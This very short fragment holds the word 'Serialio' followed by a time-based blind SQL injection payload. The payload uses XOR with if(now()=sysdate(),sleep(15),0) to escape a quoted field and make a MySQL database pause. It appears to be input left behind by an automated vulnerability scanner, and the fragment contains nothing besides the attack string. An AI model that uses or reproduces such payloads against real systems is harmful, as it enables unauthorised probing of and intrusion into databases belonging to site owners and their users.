Serialio

0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z